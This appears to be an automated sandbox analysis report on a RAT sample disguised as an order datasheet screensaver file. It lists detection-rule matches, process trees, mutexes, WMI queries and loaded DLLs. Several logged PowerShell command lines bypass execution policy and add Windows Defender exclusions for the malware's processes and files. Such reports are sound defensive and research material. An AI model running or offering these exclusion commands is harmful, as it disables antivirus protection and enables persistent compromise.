Source: 00000003.00000002.1982834712.0000000007330000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000000.00000002.1646490262.000001E856E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: 0.2.ORDERDATASHEET#PO8738763.scr.exe.1e8577f5438.2.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.ORDERDATASHEET#PO8738763.scr.exe.1e8577f5438.2.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.ORDERDATASHEET#PO8738763.scr.exe.1e8577f5438.2.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.ORDERDATASHEET#PO8738763.scr.exe.1e853c264f8.0.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.ORDERDATASHEET#PO8738763.scr.exe.1e853c264f8.0.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.ORDERDATASHEET#PO8738763.scr.exe.1e853c264f8.0.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 3.2.RegSvcs.exe.7330000.1.raw.unpack, 0sUq55.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 3.2.RegSvcs.exe.7330000.1.raw.unpack, 0sUq55.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 3.2.RegSvcs.exe.7330000.1.raw.unpack, cHlNteq60W.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 3.2.RegSvcs.exe.7330000.1.raw.unpack, cHlNteq60W.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 3.2.RegSvcs.exe.7330000.1.raw.unpack, cHlNteq60W.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 3.2.RegSvcs.exe.7330000.1.raw.unpack, cHlNteq60W.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.ORDERDATASHEET#PO8738763.scr.exe.1e8577f5438.2.raw.unpack, Settings.cs	Base64 encoded string: 'RcNq+18KJBqfwdKB5iUJsJrqyKt6z9QAOrHeL+fOyIX7jsPfNuAqVRGojp/dEteu'
Source: 0.2.ORDERDATASHEET#PO8738763.scr.exe.1e853c264f8.0.raw.unpack, Settings.cs	Base64 encoded string: 'RcNq+18KJBqfwdKB5iUJsJrqyKt6z9QAOrHeL+fOyIX7jsPfNuAqVRGojp/dEteu'

Source: 0.2.ORDERDATASHEET#PO8738763.scr.exe.1e853c264f8.0.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.ORDERDATASHEET#PO8738763.scr.exe.1e853c264f8.0.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ORDERDATASHEET#PO8738763.scr.exe.1e8577f5438.2.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.ORDERDATASHEET#PO8738763.scr.exe.1e8577f5438.2.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@22/24@4/6

Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe

Code function: 0_2_00007FF7BD602F60 LookupPrivilegeValueW,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLargePageMinimum,VirtualAlloc,GetCurrentProcess,VirtualAllocExNuma,

0_2_00007FF7BD602F60

Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe

File created: C:\Users\user\ORDERDATASHEET#PO8738763.scr.exe

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Mutant created: \Sessions\1\BaseNamedObjects\rliv2fMggtmcxYMM
Source: C:\Users\user\AppData\Roaming\XClient.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2060:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7472:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8144:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7300:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4944:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7620:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6940:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3vslwxn4.tve.ps1

Jump to behavior

Source: ORDERDATASHEET#PO8738763.scr.exe

Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: ORDERDATASHEET#PO8738763.scr.exe	ReversingLabs: Detection: 39%
Source: ORDERDATASHEET#PO8738763.scr.exe	Virustotal: Detection: 21%

Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe

File read: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe "C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe"
Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'regsvcs.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\XClient.exe "C:\Users\user\AppData\Roaming\XClient.exe"
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\XClient.exe "C:\Users\user\AppData\Roaming\XClient.exe"
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"	Jump to behavior
Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'regsvcs.exe'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'	Jump to behavior

Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	Section loaded: icu.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
